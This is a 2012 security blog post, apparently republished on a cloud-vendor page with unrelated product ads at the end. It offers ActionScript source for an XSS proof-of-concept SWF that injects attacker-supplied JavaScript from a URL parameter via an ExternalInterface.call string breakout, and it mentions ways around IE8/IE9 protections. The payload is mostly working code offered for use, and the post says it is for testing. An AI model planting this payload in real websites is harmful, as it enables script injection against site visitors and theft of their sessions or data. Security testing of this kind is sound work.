On November 12,201 2, in Security Articles, Security Posts, by Soroush DaliliAs you may already know, it is possible to make a website vulnerable to XSS if you can upload/include a SWF file into that website. I am going to represent this SWF file that you can use in your PoCs. this method is based on [1] and [2], and it has been tested in Google Chrome, Mozilla Firefox, IE9/8; there shoshould not be any problem with other browsers either. note: IE has a protection to make the "document" object inaccessible when you open a SWF directly in a browser. I have bypassed IE8 protection by using a simple redirection in Javascript. I have also found a noisy way to bypass IE9 protection by opening a new window (you may be able to do it in a less noisy way-please leave your comments if you know any other bypass method ). here is the actionscript code:
package{ import flash.display.Sprite; import flash.external.*; import flash.system.System; public class XSSProject extends Sprite { public function XSSProject() { flash.system.Security.allowDomain("*"); ExternalInterface.marshallExceptions = true; try { ExternalInterface.call("0);}catch(e){};"+root.loaderInfo.parameters.js+"///*PoC by Soroush Dalili @IRSDL - only for testing/educational purposes - He accepts no responsibility for any bad/malicious usage*/"); } catch(e:Error) { trace(e); } } }}
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
